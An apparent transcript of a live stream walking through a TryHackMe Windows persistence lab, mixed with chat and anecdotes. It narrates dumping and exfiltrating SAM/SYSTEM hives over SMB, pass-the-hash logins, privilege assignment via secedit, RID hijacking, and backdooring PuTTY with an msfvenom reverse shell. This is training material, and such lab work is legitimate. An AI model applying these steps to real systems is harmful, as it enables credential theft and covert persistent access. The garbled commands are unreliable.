Welcome back. So today we're going to be looking at the Windows local persistence stuff here. So that should be exciting. Also, if you're on and in chat, do you guys have desktops or laptops? Just doing like a little survey kind of thing here, I guess. So if you guys have desktops, let me know. If you guys have laptops, let me know. Trying to figure something out. Laptop, 100 baht. All right. Desktop, roll the dice. 100 baht. Do you use like a external keyboard, like external mouse, anything like that, or use like a mouse pad? Like, do you use anything like that? Oh, we didn't complete those two, but I'm pretty sure we can figure it out, right? Just the laptop? Oh, okay. All right. All right. Well, let's see here. Reason I'm asking, there's only 7 people in right now. I'll probably wait till more people are in. Reason I'm asking is because we have hit $99.99 on Twitch, right? And at $100, you get paid out, right? So I started looking at some different stuff. I was like, okay, well, like I said, the stuff's going to be going back to you guys, you know. So I was looking at like Red Team Field Manual as like a giveaway, maybe like a couple giveaways with that. There was also this cool, let me see if I can actually pull it up. Amazon, what's it called? Amazon Linux commands. Mouse pad. There's also this Amazon Linux commands mouse pad thing like right here. I thought that was pretty cool. It has like a whole bunch of Linux commands on there, things like that. Thought that would just be a cool thing like right there. But yeah, I was thinking about doing a giveaway probably this weekend for stuff. The more you're on here, stuff like that, the more of a chance you do have to win. There's one thing, like regulars have like a higher chance. Like I'm looking at like right now, like regulars have like a higher chance to win, things like that. So I was looking at different things, but I was like, well, I mean, like if someone wins like the mouse pad and they use a laptop, they don't really need a mouse pad or whatever else, then they could probably, you know, we could like trade out something like that. They'd be like, no, I want this, you know, then I would, okay, cool. Well, you know, I'll probably list like the prize or something like that, like what we're going to have at that time. And then like they could trade it out or whatever else, you know, for something else, you know what I'm saying? But we're at $99.99. I'm pretty sure I'm going to make a penny with this stream with just ads. So I'll probably do it this weekend, which this weekend my time, like 9 a.m. Like I'll probably start streaming this weekend at like 9 a.m. or something like that because we're going to be doing a lot of the Windows machines. And then obviously my time is different from your guys' time. So that's like 8 p.m. Eastern Standard Time. We'll probably do a couple giveaways. And one of the things is, though, you do have to either live at an FPOAP, FPOAE, you know, one of the FPO addresses, or in America for a giveaway. Because I've heard that it's extremely difficult. Like other countries, like there's different laws and things like that for giveaways, stuff like that. America's just like, yeah, you want to buy for someone, buy for them. Go for it. All right. Let's go ahead and start this guy off. What do we start with? We are starting with tampering with unprivileged accounts. All right. So we do have a little thing here. We got to be able to get in here first. I believe that's actually the admin credentials, like right there. We do need to come in as administrator first, and then from there start to mess with stuff. We can do an RDP. I believe we can also do a WinRM session. Let's try a WinRM session. That's an old one. Make directory Windows persistence. We'll CD into Windows persistence, and we'll do a quick people WinRM on 10.10.240.152 with the username of administrator and the password of password321. All right, cool. So we're in here. That was actually pretty quick. Let's go ahead and I believe we have to change a user. So let's go ahead and do a net or a who am I /priv. Obviously I'm an administrator, so I'm gonna have all the privileges. Who am I /groups. I'm obviously going to be in a lot of groups here, stuff like that. But I'm actually looking for a specific group because the backup administrators, I believe we have to actually change. So assign group membership. So it wants us to add THM user 0 to the administrators group and then add netlocal group backup operators to THM user 1. Now, when you very first get in here, THM user 1, the backup operators group is used for deny only. So we're just going to change that out because you are supposed to change it for this next task. So we're going to go ahead and we are going to set up THM1 user to be part of the backup operators group. Like I said, it will be a deny. We're going to change it because for the task, you have to change it. I don't know why it's even a deny. And we'll go ahead and set him up for remote management users, which is going to allow us to be able to win our WinRM in as him. So we'll go ahead and we will do let's go ahead and change. Well, we can log into him, change that, and I'll show you guys what I'm talking about here in a second. Let's go ahead and grab this like right here. That's our login information for it. Might as well make life easy on this thing. All right, and yeah, whenever the giveaway happens, there'll be like a code or something like that. I'm gonna send out like a code or like a number you got picked from like whatever to whatever, and then once give people like 5 minutes or whatever. Once they pick that number, that shows who's active also, stuff like that, All right, so if we do a who am I groups right for this THM1 user, which we just added to backup operators right. If we go ahead and do a who am I groups, we can see that it is denied. Like right now, right? Backup operators group used for deny only. Let's go ahead and change that as an administrator. All right. So what we're going to do is we are going to change the registry key, right? We're going to put a 1 on the end. That 1 is going to say, hey, allow it. 0 is going to be deny it. So we're going to put a 1 on the end, say, hey, allow this. If we do a who am I groups again, we should now be allowed. I might have to log out, log back in. Or I might have to do a GP update. GP update /force. We can try that like right there. I might have to log out as THM1 user and then log back in. All right, yeah, let's go ahead and log out THM user. We'll log back into him. And that group should then be changed for backup operators. And you can see that backup operators is now changed. So we are not a deny only anymore. Now with that, backup operators, you guys have seen me do this many a times. You see me do it with system. The other night I just did it with NTDS. But we're going to go ahead. We're still going to run down it. We're still going to, do everything for it. We don't have to do anything with NTDS. We don't have to make a copy of anything, nothing like that. Because it's already going to be, but we don't have any, it's not being utilized, the NTDS, right? We're not doing the NTDS. So we're just going to make a copy of the system and then the SAM file. And then we can use secrets dump to look at both of those things. So let's go ahead and we'll copy it right into THM user 1 documents here. The system file like right there. And then we're also going to copy that SAM file. All right, so we've been out of both of those files. Let's go ahead and start up an SMB server up here. So we'll do an SMB server.py. Remember, the server's it's going to be called share, and it's going to share it at our present working directory. So we put that period there. Allow for SMB2 support. So we're going to do a copy system.back to //10.13.26.184. That's my Kali Linux IP address, my Tono IP address, /share. And we can see it starting to come through up here. And if we were to do this like right here, we were to do an ls-tech LA, we should see system.back in there. Awesome. So it's copying over like right now. And let's go ahead and copy that SAM file. So we'll copy that SAM.back file over also. We should see this guy come right back online. I may have done it a little bit too fast there. Let's see. Nope, we got it. SAM.back. SAM.back, system.back, so they're both there, right? We can go ahead and shut this guy down now. And let's go ahead and do a secrets dump for the system. And then we're going to do tax SAM. Remember, this is going to be SAM.back now. And it's still going to be local, right? It's still on our local machine here. And it says, no, it hates us. Oh, because it's called system.back. Not system. And there we go. So we dumped the SAM directory right. Now we can log in as administrator or try to crack these passwords or whatever we want to do right. We do a nano hash.text And this is persistence because we now can log in with a pass the hash through the administrator. That's why this is persistence, right? So let's go ahead and do a John hash.text, wordless rocket.text, format equals NT. And we see password 321 for administrator, but we could also use that hash, right, to log in as the administrator. We can see that the hash does not start with 31D6C, so we know that it's not null because guest and default account are null and they're not being utilized, right? They're most likely closed down. So we can go ahead and do an evil winrm now. Attack I. Let's go ahead and do an IP config down here for 10.10.240.152. Attack U administrator. The hash. And we're in as the administrator now. So until the administrator changes his password, we're pretty good. We're pretty golden with this thing, right? So we got that one, okay? Awesome. Is that all I had to do? What did I have to do for that? Anyways. Oh God, there's a lot more on here than what I thought there was going to be. What we got here? So we did that part like right there, right? Boom, boom. Okay, cool. So I guess we could log in as the administrator again and try to get that hash. Let's go ahead and we'll grab that hash for the administrator. I don't know if we're supposed to be on actual RDP for this, if like the hash like pops up afterwards or something. Why does he have a calc.link in here? That's not a good idea. I actually don't have any idea where to get that stuff from. Because all it says now is just insert flag one here. Where do I actually get? Does it actually tell me to go get a flag or anything like that? Use administrator accounts to gain through the THM. Use one execute C flags flag.exe to retrieve your flag. Okay, cool. There we go. So it's in the C drive somewhere. It's in C flags. And there we go. THM flag backed up. So we got in through the administrator's hash there. Even though we also cracked the hash. All right. So that is the first part done. I don't know if I'm going to be able to finish all this tonight. We're going to try though. All right. So special privileges and security descriptors. SE backup privilege. The user can read any file in the system, ignoring any DACL in place. And SE restore privilege. The user can write any file in the system, ignoring any DACL in place. So let's go ahead and make a little, I think I have a persistence thing in here. Maybe I do not. It might be actually under privs. So let's go ahead and we'll throw it underneath privileges. And we'll do these two. SE backup / restore. Okay. Go ahead and throw that into there. We can assign such privileges to any user independent of the group membership. To do so, we can use secedit command first. We will export current configuration to a temporary file. Okay. So let's go ahead and do that. Where's Win directory? Can we just CD into... Let's see. Let's keep going. We open the file. Oh, we just open it, huh? Okay. So let's go ahead. We're going to try to figure out like where that directory's at. Maybe I'll put a little slash in front of it, huh? LS force. Let's show us everything in here. Not seeing a Win directory, CD into Windows maybe. LS force. Don't quite know where that directory's at. Maybe CD back into documents. Users. administrator documents. Oh, that's not a place, is it? Documents, dir. Okay, let's go ahead and do that command again. Except for this time, we'll try to save it to somewhere else. See if we do something like this. It's denied. Really now. How do I actually view this file then? For detailed info. Where's that file at? Where's security at? Security logs at, I guess is my next question. Security. Logs. And what did we name it again? Config.ini. Supposedly went to security log service.log. Security logs. Okay, that looks correct to me. Like right there. I believe that's correct. Yeah, config.inf. Okay, so we found it. There we go. So we can now go ahead and let's take a picture of that, like right there. So we did this, like right here. Moved over into here. Let's see if I can see anything good in this. Okay, there we go. And let's scroll down like a little bit. We'll try to find something in here, I guess. THM user 4. Signature Chicago, $ Chicago. We have SE backup privilege, SE restore privilege, THM user 2. We can open the file and add our user to the lines of configuration. Oh, wow. Okay. So let's go ahead and bring that back to myself, open it, then we'll bring it back over here again. Let's go ahead and do something like that. That's a B server. We'll go ahead and do see if we can do this. See if we can copy it back to myself, and then bring another one back over to here. Or if we got the actual remote desktop in. Guess we'll find out here in a second. All right, that shit just came over. Let's find out. Nope. I cannot find path because it does not exist. You're 100% correct because it's called share. So you are 100% correct. It does not exist. Doesn't look like it's coming over now, does it? Probably because I said copy. I am losing it like right now, huh? Config.inf. We're not even copying anything. We're just doing stuff now. Okay, so now that we have that over on us, let's go ahead and do a sublime text for it. For config.inf. And let's try to add our guys into different stuff. So I guess we could look for SE backup privilege or some of that. And then we could add a user into here. So we can say THM user2. We could probably do a SE impersonate or something like that, right? We can do a THM user2. We can go ahead and show this like right here. Then we'll go ahead and we'll put a little box around it, showing that we added these two users. We are doing, yeah, this is the new one on TryHackMe. This is the new Windows persistence one on TryHackMe. So we can go ahead and do that. I think once we re-upload this, I think it'll actually go off of that. So he's got also an SE restore privilege. Go ahead and throw him into there too. We'll do an SE restore privilege, THM user 2. I think he threw 4 in there. We'll throw user 2 in there. I would really like to see like if they have like backup privilege, notify, don't care, system privilege, create file, debug, remote shutdown, load drivers. System profile, SE restore. That'll be okay. Take ownership privilege, impersonate privilege, create global privilege. Probably throw them into here. All right, that looks pretty good. So now we just gave user 2 a whole bunch of privileges, right? Hey, thanks a lot for follow, Lamalma. All right, so we just gave user 2 a whole bunch of different privileges, right? So let's go ahead and save that file. So we save that guy, and let's bring him back up over to here. So let's do a Python 3 HTTP server, right? Let's go ahead and do a wget HTTP 10.13.26.184 / config.inf. Our file is going to be called config.inf, and it should overwrite that config.inf, which then means that we have now giving that user different privileges on THM2. All right. So let's go ahead and log in as the THM2 user, and we'll see if he has those different privileges. So THM2 user 2, password 321. Let's go ahead and log in as him. We'll see if he has those different privileges. So we'll do a eval1rm as THM user 2. We may not be able to log in like that. May have to give him remote management user rights. Go ahead and try again. And it was password 321, right? Password 321. Okay, so we're in here. Who am I /priv? And it doesn't look like you got any of those privileges, okay? So it doesn't look like it, like right now. Is there something else I have to do here? Oh, I still have to import it, huh? So we brought that file back. Now we have to import that file back in the system. Okay, so let's go ahead and do that. Remember, since we're talking about persistence, we're already an administrator or something like that. We're just trying to stay an administrator, right? Okay, so we re-imported that. And let's go ahead and do our config SDB to config INF. So that's just going to throw that back up in there and tell it kind of like, I think this is good to throw it back up there and tell it kind of like, hey, like, look at everything and reset. Oh. Completed with an error. No map between account names and security IDs was done. Is that the error? I don't care. Let's go ahead and exit out of here and log back into him and see if we have anything. And we do not. We have THM user, THM user, THM user 2, THM user 2. Okay, maybe because I did impersonate privilege, maybe that's why. So let's go ahead and get rid of that impersonate privilege. I may have given him 2 mate privileges. Let's go ahead and get rid of that, and we'll get rid of this one like right here. So we are just going to keep the SE backup and the SE restore. We'll just keep those 2. And let's see if we can re-upload that, and let's see if we can do that again. All right, so we re-uploaded it, right? We should only have, that one should have just overwrote him, right? From here, we should now overwrite everything else once we do our import for it, right? So we'll import it. So we should have just rewrote over the SDB. Now, we're going to go ahead and rewrite over everything else. Let's see if that works. Has completed with an error again. Well, that's not good now, is it? Not too surprised, but that's not good. Check the groups. See if I'm in the proper groups here. Nope. We're just kind of copy and pasting now, and I'm not actually that surprised. What's up, B7H30? How you doing? SE restore and SE backup privilege. Those are 2. You put a little comma in there. I wonder if that's the problem. I wonder if that's the problem like right there. We didn't put a comma in, so let's go ahead and try that. That may have been my mess up like right there. Let's go ahead and do that comma in there. He's got a nice little comma in here, and all the rest of them have commas also. No space, and he's got a comma. Maybe that's the problem like right there. Hopefully that's the problem. Go ahead and throw that guy back up here. Go ahead and delete everything in here. Let's do an LS-stack force. What's up, Morkies? How you doing? Let's do a delete config.inf, delete config.jfm, delete config.sdb. And let's go ahead and do a wget for those guys again. Just so you guys know. Oh, nice. The movement, pivoting, and persistence. Just so you guys know, B7H30 and Morky is 1. We are going to be having a giveaway on Saturday at some point. I think I'm actually giving away a couple things because I'm at $99.99 on Twitch. So you get paid at $100. So I was going to do a giveaway and give a few things away because everything that I make here is want to give back to the community. I don't really want it. So on Saturday, we're going to be doing a giveaway. And I'm thinking like Red Team Field Manual. I'm thinking like some Linux mouse pads, stuff like that. Just different small little things. Nothing huge. You do have to live in America for the giveaway, because or have an FPO address, because I know there's a whole bunch of laws in other countries, stuff like that, about giveaways. All right, let's go ahead and do this again. So that'll be on Saturday at some point. Ooh, yeah, I did it. Okay. I'm going to do that. We'll go ahead and do this again. And that's how we completed successfully. Okay, so it was that. So let me go ahead and take a print screen of what I just did there. I wonder if I could have did the other ones also, if I would have actually put a comma in there. We'll try that afterwards. And I was going to say, notice the comma. Okay, so we'll go ahead and copy this. We'll throw this back over here. Not a space. There we go. Okay. So we have that back over there, right? We then ran these two commands like right here, right? So first we dropped it down. Let me make sure that I actually had that we dropped it down. Yep, I had to export. We brought it back to ourselves. Then we ran these two commands like right here. So re-import it, reconfigure the database, which then allowed us to be able to do this like right here. Once we did that, reconfigure that database, we then got this like right here. Let me go ahead and scroll up just a little bit. There we go. We'll copy that. We'll throw that over to here. There we go. All right, now let's go ahead and do, exit out of here, and then we'll do a whoami/priv again. So let's go ahead and get back into THM user 2. And we'll do a whoami/priv. And now we do have some more privileges we can see. That is pretty freaking cool. I didn't know you could do that. That is pretty. Let me go ahead and show them beforehand. The config file. All right, cool. That's pretty cool, like right there. I know this was a thing. I like that. So now we can do the same things that we've learned a couple times now. NCDS, system.back, whatever else, with THM user 2, because he is part of that backup privilege. Mouse part of backup groups now, I wonder? No, just the backup privilege. Okay. All right. That's pretty cool, like right there. You should have a user equivalent privileges to any backup operator. Okay, the user still can't log in the system via WinRM, so let's do so. Okay, we already did that. Right? We already gave him the ability to log in through WinRM. Not a big deal for that. And let's go ahead and do a guy like right here. And we should be able to get that flag, even though we're WinRM in. Sorry, you're still missing something. Of course we are, because we haven't probably done this stupid part like right here, even though we don't really need to. Because we already gave him remote management users. So we have to actually RDP into this thing. (10.10.240.152). We're going to have to RDP in as the administrator to be able to change this. I believe it was password 321 if I remember correctly. Hey, thanks a lot for the follow, Kunichu. All right, so we want to go down to We wanted to add THM user 2. We should be able to add him. All right. I'll see why not. You can add THM user 2. Yeah. Okay. Maybe just because I didn't type in the 2. Usually it will find all the different users in there. What am I got going on here? I'm going insane like right now. There we go. There we go. We'll say okay. We'll give THM user 2 full control. Apply. Okay. And I'm hoping now we can do it without logging out and logging back in. We'll see. Supposedly we're still missing something even though we actually had the privileges and everything else. We'll just skip it. If we can't get it, we'll just skip it. All honesty, I'm not going to play around with the flag the entire time when we actually got the privileges. We gave them everything they need. Supposedly we're still missing something. I don't know what it is, but we're there. So, I mean, I don't really know what it wants because we have full privileges now. Yeah, I don't really know what it wants me to do. We have full privileges, so I don't really care. All right, let's keep going. I'll work on that thing later. Just grab it from somewhere else, something like that, because we obviously got it. Who am I /priv? Sorry, you didn't complete the task. I think I did, though. You know, unless it wants me to actually grab that backup and everything like that, but I mean, I don't see why we would do that. I don't see why I would copy the reg system key over and do the same thing we just did above. I don't see why it would want me to, but we can. Maybe we can. I don't know what the executable is actually looking for. Is that what you wanted? Nope. Okay. Supposedly, I'm still missing something. You know. That makes sense. All right. RID hijacking. Another method of getting administrator privileges without being an administrator is changing some registry values to make the operating system think you are the administrator. When it usually, we've actually done this one before. RID hijacking. We have definitely done that before. Let's go ahead and look at that. Okay, so in any Windows system, default administrator account is assigned to the 500 group, and regular users are assigned to the 1000 group. So these are all administrator accounts, like right here. These are all user accounts. We could change this to a 500, thus allowing us to be able to more than ascertainment, thus allowing us to be able to become an administrator on here, right, with that other account. So we're going to do it for THM user 3, it looks like. So he's saying that he already has PSExec64 on here, which we do have on our system. You know how I feel about that. So let's go ahead and do a CD into tools. And let's go ahead and do LSTech-LA. I believe I have PSExec64 on here. And there it is, like right there. So let's go ahead and make an SMB server in here. And we'll go ahead and we will, we'll make a Python server in here. And we'll go ahead and we'll bring that back over here. And we want to actually do this on the administrator. And then we're going to make the number 3, THM3 user, an administrator. And then we'll do a tac out file for psexec64.exe. All right, so we have that now, right? So we can go ahead and run that with a regedit, which I think I'm actually got to run that in remote desktop. So let's go ahead and hop over to remote desktop. We'll see it in the desktop. And let me get this a little bit bigger for you guys. So I believe it's This one? Nope. This one? That one. Okay. Crush that problem. Right click. Edit. Nope. Properties. Font. We'll do 18. Okay. There we go. Is that big enough for everybody? We should have ps-exec in here, which we do. All right, so we can go ahead and run that ps-exec file like right there. Let me go ahead and start actually doing my RID hijacking over here. And I will show that, hey, we went ahead and we grabbed that ps-exec file, right? I'm going to copy that. All right, ascertainment of the, as I have told a couple others on Saturday, which is most likely to be Friday, your time, wherever you're from. All right, it'll be like 8 p.m., 9 p.m., something like that Friday. I'm going to start streaming, all right, which is Saturday morning Okinawa time or Tokyo time at 9 a.m. All right, 9/10 a.m., okay? I'm going to start streaming, and we are going to be having giveaways for like the Red Team Field Manual, stuff like that. You do have to live in America. You do need an FPO AP address. Either one of those two, FPO address or live in America. If you have an FPO AP address, just let me know. I'll just drive the thing to your house. All right, we're going to do this now. So let's go ahead and do a reg edit. All right, so let's go ahead and do that. And this should open up. Hey, thanks a lot for follow, Varens and BMX. I don't know what the UK's rules are for stuff like that. Was not found. It wasn't? Because it looks like it's right here. Oh, you want to know why? Because he did it in command prompt. We're doing it /. There we go. And that's going to go ahead and open up our reg edit, right? Okay, now we're in the registry editor. We want to go down into Sam Domains account, and then we want to look at someone's account here, where there will be a key for each user in the machine. Since we want to modify THM user 3, we need to search for a key with its RID and hex 01010, which is going to be THM user 3. So we need to search for that hexadecimal. I'm just going to go ahead and actually get this like right here. And I'm going to throw that into my stuff over here. So let's go ahead and hop into, looks like Sam, a lot of Sams. Starting off with HK local machine. Sam. I'm going to go with domains. Let me go with account. Users. I think we're getting somewhere. And we are looking for user number 0x3f2. So 3f2. There we go. All right. Awesome. Oh, nice. Thank you very much, 10x Programmer. I was about to say, I think we did this before in PowerShell, not actually opening up like this. Whenever I did it another time. Notice the RD is stored using little endian notation so the bytes appear reversed. Okay. If you do anything with buffer overflows, you know exactly what that means. So we will now replace those two bytes, the RD of an administrator, 500, which is 0x, switching around the bytes F401. Go ahead and just take a print screen of that like right there. So I've never done it this way, like right here. I have done it a different way where we changed the RID. I believe it was within PowerShell that we did it. So, and that was in value name of F. Okay, so this is now going to be this F203. is now going to be F401, I believe it is. F401. F401. We'll say okay. So now we're in the 500 group, right? Next time THM3 logs in, LSAS will associate it with the same RID as administrator, grant them the same privilege. That's pretty freaking cool. We've done this before within PowerShell, but that's pretty cool, like right there. I like that a lot. Hey, thanks a lot for the follow, Orthodox. Okay, let's go ahead and do that one like right there, because that's pretty freaking cool. And let's go ahead and, I don't know if we can win our random in or not. So let's go ahead and try to win our M in. The password's been the same for everyone, which is pretty nice. Net local group. Remote management. Users. Add THM user 3. I know you guys can't see that. My face is in the way. Sorry. I just add him to allow him to be in a remote management users group so that he can log in through here. Through WinRM. That's all we did like right there. Which that should have worked as long as the password's correct. Password 321, THM user 3. That should have definitely worked. I wonder if I did it too fast. THM user 3, password 321. Or you might have an actual deny on him where even if I do that, it doesn't matter. Good evening, everybody. It's actually 7:50 p.m. here. But good morning, everybody. Good morning, Christy. How you doing? Let's go ahead and log out of here, and we'll log back in. We'll log in as THM user 3, and we'll go from there. Christy just says, I explained to others, on Saturday there will be a giveaway for a couple different things. I'm sitting at $99.99. Password 321. Maybe I should actually put in 3. But yeah, on Twitch. So at $100 you get paid out, you know. So I was going to do a giveaway on Saturday for a few different things. Saturday morning my time, evening East Coast time. So it's going to be throughout the day on Saturday. I don't know when the giveaway is actually going to start. It's not just going to start, you know, Saturday at 09 in the morning for me. THM user 3 does not seem to have as many resources as everybody else, and he is tweaking out like right now, man. THM user 3 cannot handle this. Doesn't know what to do. Help me! Alright, THM user 3 is freaking out. Let's go ahead and try and get back into him again. THM user 3. Password 321. Whatever you guys saw, I saw the same thing. Oh my god, what is happening here? With THM user 3. Oh, even by full screen, it doesn't matter. There are flashing lights on the screen. If you have if you can't do that, stop looking. Alright, THM user 3 seems to be broken. Let's go ahead and try to do THM user 2. Let's try to get him as him. We're not going to be able to get the flag, but whatever. I forgot the IP address. 10.10.240.152. Might be able to grab THM user 2's flag. I don't know. Because it wouldn't allow us to grab that, so. Said that we didn't do what we were supposed to do, although we did. Which I found kind of funny. I was like, but we did do what we were supposed to do. He's now a backup operator. I just also got in through other stuff. Okay, so THM user 2, can he just not log in here? Okay, THM user 2 just isn't allowed to log in. Okay. It's kind of getting a little bit annoying now. Okay. Oh, God. Okay. Oh, boy. Let's try our desktop. I never use our desktop, so I always forget how to do it. Let's give you a nice like little thing up top. I thought I gave you like a cool like little thing of like how to exactly do it. TAC U, THM user 3. I take it could be TAC P. Hey, thanks a lot for the follow, Crown042. TAC P. Password 321. Still flashing? Yeah, it's still flashing. What was I thinking? God, try hack me. You're slowly dying. You're slowly just dying. Alright. So when I was in, I'm going to stop for a second to tell you how bad this actually is, like right here. When I was in Atsugi, which is in mainland Japan, we were on an op, right? And we get there, we set everything up, internet's freaking blazing, we're moving fast, everything's working great, right? Lieutenant comes up to us, he goes, Gunny and Brady, and we walk over, like, yes, sir. You're like, what's up, dude? You know, about to get mad, you know. It's like, can we scan to the share drive? I was like, who the fuck cares? You know, like, for what, dude? What are we scanning? We're on an op. Like, what are we scanning? He's like, well, the pilots were asking me if we could scan to the share drive. I was like, dude, on my list of, like, you know, things that are, you know, like, priorities, I was like, getting back to Okinawa's before that. I was like, but we will make that happen, right? We will scan to a share drive. Well, here's the problem. We had 0 servers. We didn't have any servers with us, right? They did that. We didn't have any server operators. We didn't have anything like that, right? So we grabbed a computer. Now, these computers are already pieces of trash, right? We grabbed this computer, and it is a computer that these guys AVI, right? They're like avionics maintenance. I don't know what the fuck I don't care what the hell they do, right? But they do something in the wing. I don't care. This is the very first time I've ever been in the wing. It's miserable. Like, whatever. You do something with the wing, right? So they like fix stuff. That's all I know, right? So we had one of their computers, and they accidentally spilled Monster on it. When they spilled Monster on it, it fried the freaking keyboard. It was this laptop, right? So the keyboard didn't work. The keyboard was also super sticky, okay? The mouse pad didn't work, right? The only thing that worked on this thing was like the screen. It like barely worked, right? So we ended up taking a USB, right? Just a USB stick that had the share drive on it that we pulled off of a ship, right? So we had the share drive from the ship. We plugged the USB in his computer, and we just shared it, right? We tried to make a VM to actually create an actual share on it. When we put the VM on the computer, it tried to start the VM. We gave it around 6 hours. Like, we left shift and came back, and it was still just trying to boot the VM up. And we're like, all right, this ain't going to happen, right? These computers are fucking trash, right? So we ended up just sharing the gig stick, right? And then just putting the password, you know, just like whenever someone needs to do something, we just go in there and we put in the password for it, right? We ended up making a password, everything like that, so not anyone could just get in the share drive, right? So we do that. And it worked. It worked the entire op. And people were pulling stuff off the share drive, putting stuff on the share drive, scanning to the share drive. And it is now 2020, and I'm hooked into a server and remote desktop. Can't do this. I don't know why that made me think of what was just happening. Maybe because the screen was doing that, and that's what we were dealing with the whole time with the with our awesome share drive server that we had. And the best part was that we didn't have enough. Oh God, we didn't have enough power cables, right? Because of course we're in the Marine Corps, so you know we buy laptops without power cables because that works. All right, so we didn't have enough power cables, so we would power up a laptop and we would unplug our server that, you know, the battery still worked on it. We totally forget to plug it back in. So someone would come to us like 3 hours later. They'd be like, hey, can we still scan the share drive? You know, like it doesn't seem to be working. And we all look at the computer, just be this black screen, you know, no lights on at all. I'd be like, yeah, hey, it'll be up in about 5 minutes. You know, he's got to mess with some stuff. And we plug it back in, have to turn it back on. It was such trash. Oh my God, it was such trash. Let's try to add this guy to like remote management users again. System error occurred. The specified name is already a member of this group. So then let me in. Like, password. Oh wait, we were trying to do this up here, weren't we? Before I went on story time, huh? But yeah, that was quite the time. So do I have to like tell it like, hey, do I have to actually give it? Can I just like throw an IP in at the end of it? It'd be really nice if you gave us like a most used kind of thing, like right here. That'd be nice, but that was obviously way too difficult. Wrote an entire book on the help page, but couldn't give like an example. That's obviously way too difficult to do. No examples for you. Is it just that? Can we just do that like right there? Okay, we're getting somewhere, yes. Okay, that worked really good. Failed to initialize. Do you have the correct Kerberos Stingray ticket? I don't fucking know. If yes, use okay, attack V. I don't know. Okay, that helped out. That worked really good. I don't know what version of TLS it's fucking using. Just like French TS. There we go. This is working super good so far. So we just can't get into this guy. We just won't get user 3 stuff, I guess. We're just not allowed to. You have to get through it with the flashing screen. Hopefully nobody has that one thing where they have seizures from flashing screens. Like, we're gonna start putting little things on. Try hack me's. This may cause problems. Oh God, it's become trash again. I really want to restart it because we just did all that for user 3. I mean, we didn't really do much, did we? We just kind of just changed out the config file. Did we even change out the config file for user 3? What did we do? Yeah, we just changed out the config file for user 3. All right, it looks like user 3 doesn't want to get in. Let's see if we get back in with administrator. Let's see if we're still in this machine. Okay, so we can still get in. He's part of the remote management users group. Hey, thanks a lot for the follow, Cherry Coder. But for some reason, THM user 3 just doesn't. Is it like THM user 3, right? I'm not like, okay. So I sure wasn't. If you did everything correctly, you should be logged in to the administrator's desktop. Oh, we're logged into something. We are logging into something. THM user 3, password 321. Okay, I just want to make sure I'm not going insane here. That is correct. Like, I just want to run the file. That's all I want to do. I just want to. I like how we're part of remote management users, but we can't. God damn it. So. This is the best paid for service in the world. Look at this. What do I do with this? Does anyone know? Cool box. Yeah, it's something. It was cool. It was actually pretty good THM user 2, we did what we were supposed to with. And then all of a sudden, it like was like, you didn't do it. Like, but we did. Like, so THM user 2, right? We were supposed to make a part of the backup operators group. Or privileges. So we can actually get in with him. That works, right? And if I go to whoami/priv, we have the privileges, but we're not allowed, like if we run the flag, it's like, you didn't do it. But we did. Like, you guys wanted us to do privileges. And we did that. But now you're saying that we didn't. So that was THM user 2. THM user 3. You close it and go next. THM user 3. You can't open up the thing for it. So I guess we're just not going to grab that flag. Oh my God. It's for your convenience, the user can connect via RDP with the following credentials. Super convenient. For your convenience, here you go. Let's do X-free. See how it gives you this nice like little thing right here? See how it does that? More places need to do that. All right. Please. So then we can just go THM user 3 I'm going to go with. Okay, it's password 321. And we are connecting to 10.10.240.152. See if this works. Now I just want RDP to work. So it just doesn't do it. All right. Okay. Let's talk back in as the administrator with Remina. Hopefully nobody has any problems with that. Maybe we have to be logged in as the administrator. Maybe that's a security feature. No, why? I just went to log into THM user 3 and it logged me in, or administrator, and now THM user 3 just logged in. I mean, I know he's an administrator now, but he's not the administrator. It wasn't his. Oh, God. Now I fucked it all up. Oh, God. Oh, God. Oh, God. I'm sorry. I don't know what to do. Break the chain. Okay, well, that was fun. Let's go to backdooring files, I think. I don't know. Should we stop? Like, kind of scared that people are having, like, actual problems with those flashes. All right. Let's go ahead and let's do backdooring files. We should probably actually, I mean, that's more of a service. That we kind of can do stuff with, like right there. Right here, but this is more of all, we should probably do like a, we should make like a persistence tab or something like that. Oh, good thing it went right underneath the persistence tab, just like I thought. Let's go ahead and delete this. We should probably throw RID hijacking into here. Yeah, see, we did it for SID history before. And then SD backup restore, we throw that into persistence. And now let's do backdooring files. At least we're doing it. Let's do backdooring files. And we'll go ahead and we'll try this guy right here. All right, another method establishes persistent state of tampering with some files we know the user interacts with regularly. By forcing modifications to such files, we can plant backdoors and will get executed whenever the user accesses them. Since we don't want to create any alerts that could blow our cover, god damn, stop. The files we alter must keep working for the user as expected. While there are many opportunities to plant backdoors, we will check the most commonly used ones. Okay, so first thing is we're going to, if you find executables laying around the desktop, chances are high that the user might use it frequently. Suppose we find shortcuts to PuTTY lying around. If we check these shortcuts properties, we can see that it usually points to C program, blah, blah. From that point, we can download the executable on our task machine and modify it to run any payload we wanted. We can easily plant a payload of your preference in any exe with MSF Venom. The binary will still work as usual, but execute an additional payload silently by adding an extra thread in your binary to create a backdoor putty.exe. All right, cool. So let's go ahead and I guess we could do some of that, right? We'll execute a reverse TCP interpreter payload without the user noticing. While this method is good enough to establish persistence, let's look at other sneakier methods. Let's try this real quick. Let's see if that's actually sitting in there. We'll try to create a backdoor on it. Was it program files, right? PuTTY in here? PuTTY. I use PuTTY a lot. Hello, Cyber's Guide. It's Gasky. How are you? All right, so we got our PuTTY executable like right here. So it wants us to download that PuTTY executable right back on our own machine, correct? And then we're going to do a little tacx putty.exe. All right, cool. Let's do that. Let's do that. Let's make ourselves a little SMB server up here. And we will say, hey, copy putty.exe to 10.13.26.184/share. Here it comes. All right, we got it in here now, right? Let's go ahead and throw that MSF Venom. Oh, God. We don't want to try that again. Let's go ahead and throw that MSF Venom in there. And supposedly this is going to put an executable within PuTTY, so it's going to mess with PuTTY. It's going to rename it puttyx.exe. Let's go ahead and change our L host to 10.13.26.184. And it looks like we're going to do a Windows x64 shell reverse TCP, so we should just be able to use a netcat on there. So let's go ahead and do a, whoopsie daisy, that's not what I want to do. 10.13.26.184. I want to go up here. Netcat LVMP444. Let's go ahead and make that. It's going to be called PuTTyX. We're going to name it PuTTY again and see if we can just start a PuTTY. We'll try it on PuTTyX first, then we'll rename it PuTTY, then we'll try it out PuTTY next. Make a web server over here. And let's do a wget over here for PuTTyX now. How do we... And then from here, we'll go ahead and we'll try to run that PuTTyX. And we'll see if we get it. And we do get a backdoor back. Awesome. Who am I? And we are the administrator. So let's go ahead and let's copy all that in there, because that was pretty cool, actually. I like that. I like that a lot. I like that a lot. I like that a lot, a lot. I like that a little bit too much. That's some 